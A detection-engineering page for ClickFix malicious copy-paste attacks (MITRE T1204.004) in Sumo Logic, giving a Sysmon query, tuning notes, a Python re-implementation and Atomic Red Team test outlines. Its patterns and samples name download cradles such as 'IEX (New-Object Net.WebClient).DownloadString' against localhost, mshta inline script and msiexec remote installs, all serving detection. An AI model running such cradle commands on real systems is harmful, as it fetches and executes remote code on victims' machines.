T1204.004 Sumo Logic CSE · Sumo

Detect Malicious Copy and Paste in Sumo Logic CSE

Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.

MITRE ATT&CK

Tactic: Execution
Technique: T1204 User Execution
Sub-technique: T1204.004 Malicious Copy and Paste
Canonical reference: https://attack.mitre.org/techniques/T1204/004/

Sumo Detection Query

Sumo Logic CSE (Sumo)
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*endpoint*)
| where _raw matches /EventCode=1|EventID.*=.*1|event_simpleName.*ProcessRollup/
| parse regex field=_raw "(?:ParentImage|ParentProcessName)[\":\s=]+(?P<parent_image>[^\"\s<>\n]+)" nodrop
| parse regex field=_raw "(?:^|[\s,\"])(?:Image|ProcessName|process_name)[\":\s=]+(?P<process_image>[^\"\s<>\n]+)" nodrop
| parse regex field=_raw "(?:CommandLine|ProcessCommandLine|command_line)[\":\s=]+(?P<cmdline>[^\n<]{1,2048})" nodrop
| parse regex field=_raw "(?:User|username)[\":\s=]+(?P<username>[^\"\s<>\n]+)" nodrop
| where (
    (
      parent_image matches /(?i)(\\|\/)explorer\.exe(\"|$|\s)/
      AND process_image matches /(?i)(\\|\/)?(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe(\"|$|\s)/
    )
    OR (
      parent_image matches /(?i)(\\|\/)(chrome|firefox|msedge|iexplore|brave)\.exe(\"|$|\s)/
      AND process_image matches /(?i)(\\|\/)?(powershell|pwsh|cmd|mshta)\.exe(\"|$|\s)/
    )
    OR (
      process_image matches /(?i)(\\|\/)?(mshta|wscript)\.exe(\"|$|\s)/
      AND parent_image matches /(?i)(\\|\/)(explorer|chrome|firefox|msedge|iexplore|brave)\.exe(\"|$|\s)/
    )
  )
| where cmdline matches /(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIWR\s|\bcurl\s|\bwget\s|certutil.*urlcache|bitsadmin.*transfer|-EncodedCommand|-enc\s|FromBase64String|Invoke-Expression|IEX[(\s]|javascript:|vbscript:|msiexec.*https?:\/\/|regsvr32.*\/i:https?:\/\/)/
| eval RunDialogExecution = if (parent_image matches /(?i)explorer\.exe/, "true", "false")
| eval BrowserSpawn = if (parent_image matches /(?i)(chrome|firefox|msedge|iexplore|brave)\.exe/, "true", "false")
| eval DownloadCradle = if (cmdline matches /(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|certutil.*urlcache|bitsadmin.*transfer|\bcurl\s|\bwget\s)/, "true", "false")
| eval EncodedPayload = if (cmdline matches /(?i)(-EncodedCommand|-enc\s|FromBase64String)/, "true", "false")
| eval InlineScript = if (cmdline matches /(?i)(javascript:|vbscript:)/, "true", "false")
| eval InvokeExpression = if (cmdline matches /(?i)(Invoke-Expression|IEX[(\s])/, "true", "false")
| eval RemoteExec = if (cmdline matches /(?i)(msiexec.*https?:\/\/|regsvr32.*\/i:https?:\/\/)/, "true", "false")
| eval ClickFixScore = (if(RunDialogExecution=="true",1,0)) + (if(BrowserSpawn=="true",1,0)) + (if(DownloadCradle=="true",1,0)) + (if(EncodedPayload=="true",1,0)) + (if(InlineScript=="true",1,0)) + (if(InvokeExpression=="true",1,0)) + (if(RemoteExec=="true",1,0))
| fields _messagetime, _sourceHost, username, parent_image, process_image, cmdline, RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, RemoteExec, ClickFixScore
| sort by ClickFixScore desc, _messagetime desc
Severity: high. Confidence: high.

Detects ClickFix / Malicious Copy-Paste (T1204.004) by parsing Sysmon Process Create (Event ID 1) logs in Sumo Logic. Identifies scripting interpreter processes (PowerShell, cmd, mshta, wscript, cscript) spawned by explorer.exe (Windows Run dialog) or browser processes, where the command line contains download cradle patterns, base64 encoding, Invoke-Expression, or inline javascript:/vbscript: handlers. Scores each event across seven behavioral indicators to surface high-confidence ClickFix intrusions.

Data Sources

  • Sumo Logic Installed Collector with Windows Event Source collecting Microsoft-Windows-Sysmon/Operational
  • Sumo Logic Cloud-to-Cloud Source ingesting Windows endpoints via Sysmon + WEF

Required Tables

Windows Sysmon Event ID 1 (Process Create) logs via Sumo Logic Installed Collector

False Positives & Tuning

  • IT automation workflows where SCCM task sequences or Group Policy scripts trigger PowerShell download cradles through user-context processes, particularly during OS provisioning or patch deployment windows.
  • Developer workstations where browser-based IDEs (e.g., GitHub Codespaces local companion, VS Code Live Share browser component) spawn local PowerShell with encoded parameters for workspace synchronization.
  • Security testing using Atomic Red Team T1204.004 tests or manual simulation as part of scheduled red team exercises — these will match all behavioral indicators and receive maximum ClickFixScore.
  • Help desk macros or IT runbook tools that construct encoded PowerShell commands programmatically and execute them in the user session context, generating high scores without malicious intent.
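To make the query's filter and scoring stages concrete, and to show where the tuning exclusions above plug in, here is an added Python re-implementation that is not part of the Sumo rule or of the page's own material. It runs the same lineage gate (explorer.exe or a browser spawning an interpreter), the same command-line gate, the seven-indicator ClickFixScore and a tuning allowlist over constructed Sysmon key=value lines; every path, host and user in the samples is invented, and the allowlist pattern is an assumed example of the kind of internal-host exclusion the false-positive list calls for. It also decodes -EncodedCommand arguments so the analyst sees the plaintext (the value used in Test 3 of the Testing Methodology decodes to whoami).

```python
import base64
import re

# Constructed Sysmon Event ID 1 records in the flat key=value layout the query's
# parse-regex stages expect. Paths, hosts and users are made up for this example.
SAMPLE_EVENTS = [
    # Win+R ClickFix: explorer.exe -> powershell.exe, download cradle piped to IEX
    "EventCode=1 ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=\"powershell -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://127.0.0.1:8080/x')\" User=CORP\\alice",
    # Browser ClickFix: brave.exe -> mshta.exe with an inline javascript: handler
    "EventCode=1 ParentImage=C:\\Users\\bob\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\brave.exe "
    "Image=C:\\Windows\\System32\\mshta.exe "
    "CommandLine=\"mshta javascript:new ActiveXObject('WScript.Shell').Run('cmd /c echo ClickFix-AtomicTest')\" User=CORP\\bob",
    # Win+R ClickFix with an encoded payload (the Test 3 value, which decodes to whoami)
    "EventCode=1 ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=\"powershell -EncodedCommand dwBoAG8AYQBtAGkA\" User=CORP\\carol",
    # Benign: SCCM client runs a cradle, but the parent is neither explorer nor a browser
    "EventCode=1 ParentImage=C:\\Windows\\CCM\\CcmExec.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=\"powershell -c Invoke-WebRequest http://sccm.corp.local/s.ps1\" User=SYSTEM",
    # Benign: Run dialog launches cmd.exe with no suspicious arguments
    "EventCode=1 ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\cmd.exe CommandLine=\"cmd.exe\" User=CORP\\dave",
    # Benign but noisy: an IT runbook fetched from the Run dialog off an (assumed) internal host
    "EventCode=1 ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=\"powershell -c Invoke-WebRequest https://intranet.corp.local/fix.ps1 -OutFile fix.ps1\" User=CORP\\erin",
]

# The four parse-regex stages of the query, one named group each (nodrop = empty string on miss).
PARSE_PATTERNS = {
    "parent_image": re.compile(r'(?:ParentImage|ParentProcessName)[":\s=]+(?P<parent_image>[^"\s<>\n]+)'),
    "process_image": re.compile(r'(?:^|[\s,"])(?:Image|ProcessName|process_name)[":\s=]+(?P<process_image>[^"\s<>\n]+)'),
    "cmdline": re.compile(r'(?:CommandLine|ProcessCommandLine|command_line)[":\s=]+(?P<cmdline>[^\n<]{1,2048})'),
    "username": re.compile(r'(?:User|username)[":\s=]+(?P<username>[^"\s<>\n]+)'),
}

# Lineage filter. The query's third OR branch (mshta/wscript under explorer or a browser) is
# covered by adding wscript to the browser-child set; the explorer branch already includes it.
RUN_DIALOG_PARENT_RE = re.compile(r'(\\|/)explorer\.exe("|$|\s)', re.I)
INTERPRETER_RE = re.compile(r'(\\|/)?(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe("|$|\s)', re.I)
BROWSER_PARENT_RE = re.compile(r'(\\|/)(chrome|firefox|msedge|iexplore|brave)\.exe("|$|\s)', re.I)
BROWSER_CHILD_RE = re.compile(r'(\\|/)?(powershell|pwsh|cmd|mshta|wscript)\.exe("|$|\s)', re.I)

# The five command-line indicators from the eval stages, plus the IWR pattern that only the
# where-clause admits (it gates the event but adds nothing to the score, as in the query).
CMDLINE_INDICATORS = {
    "DownloadCradle": re.compile(r'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|certutil.*urlcache|bitsadmin.*transfer|\bcurl\s|\bwget\s', re.I),
    "EncodedPayload": re.compile(r'-EncodedCommand|-enc\s|FromBase64String', re.I),
    "InlineScript": re.compile(r'javascript:|vbscript:', re.I),
    "InvokeExpression": re.compile(r'Invoke-Expression|IEX[(\s]', re.I),
    "RemoteExec": re.compile(r'msiexec.*https?://|regsvr32.*/i:https?://', re.I),
}
GATE_ONLY_RE = re.compile(r'\bIWR\s', re.I)


def parse_event(raw):
    """Mirror the event-type check and the parse stages; None if not a process-create record."""
    if not re.search(r'EventCode=1|EventID.*=.*1|event_simpleName.*ProcessRollup', raw):
        return None
    fields = {}
    for name, pattern in PARSE_PATTERNS.items():
        m = pattern.search(raw)
        fields[name] = m.group(name) if m else ""
    return fields


def suspicious_lineage(parent, child):
    """True when explorer.exe (Run dialog) or a browser spawned a scripting interpreter."""
    if RUN_DIALOG_PARENT_RE.search(parent) and INTERPRETER_RE.search(child):
        return True
    return bool(BROWSER_PARENT_RE.search(parent) and BROWSER_CHILD_RE.search(child))


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand / -enc argument (Base64 of UTF-16LE), or None."""
    m = re.search(r'-(?:EncodedCommand|enc)\s+([A-Za-z0-9+/=]+)', cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(raw):
    """Apply both where-gates, then compute the seven-indicator ClickFixScore. None = filtered out."""
    ev = parse_event(raw)
    if ev is None or not suspicious_lineage(ev["parent_image"], ev["process_image"]):
        return None
    cmd = ev["cmdline"]
    hits = {name: bool(rx.search(cmd)) for name, rx in CMDLINE_INDICATORS.items()}
    if not any(hits.values()) and not GATE_ONLY_RE.search(cmd):
        return None
    hits["RunDialogExecution"] = bool(re.search(r'explorer\.exe', ev["parent_image"], re.I))
    hits["BrowserSpawn"] = bool(re.search(r'(chrome|firefox|msedge|iexplore|brave)\.exe', ev["parent_image"], re.I))
    ev.update(hits)
    ev["ClickFixScore"] = sum(hits.values())
    ev["DecodedCommand"] = decode_encoded_command(cmd) if hits["EncodedPayload"] else None
    return ev


def run_detection(events, allowlist=()):
    """Score every record, suppress allowlisted parent/command-line matches (tuning), sort by score."""
    allow = [re.compile(p, re.I) for p in allowlist]
    results = []
    for raw in events:
        ev = score_event(raw)
        if ev is None or any(rx.search(ev["cmdline"]) or rx.search(ev["parent_image"]) for rx in allow):
            continue
        results.append(ev)
    results.sort(key=lambda e: e["ClickFixScore"], reverse=True)
    return results


if __name__ == "__main__":
    # Assumed tuning entry: scripts pulled from the internal runbook host are expected noise.
    for ev in run_detection(SAMPLE_EVENTS, allowlist=[r'https://intranet\.corp\.local/']):
        print(ev["ClickFixScore"], ev["username"], ev["process_image"], ev["DecodedCommand"])
```

One caveat the re-implementation makes visible: the page's parse regexes stop each captured path at the first whitespace character, so a ParentImage under a directory containing a space (for example a system-wide browser install under Program Files) is truncated to its first token and never satisfies the browser branch. The sample uses a per-user Brave install path with no spaces for that reason; on real telemetry, prefer the structured Sysmon fields over a flattened key=value line, or widen the parent and image captures to handle quoted paths.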

Testing Methodology

Validate this detection against four Atomic Red Team tests for T1204.004. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: ClickFix Run Dialog PowerShell Download Cradle Simulation

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.

  2. Test 2: ClickFix mshta Inline JavaScript Execution

    Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.

  3. Test 3: ClickFix Base64-Encoded PowerShell via Run Dialog

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.

  4. Test 4: ClickFix msiexec Remote Package Execution

    Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.
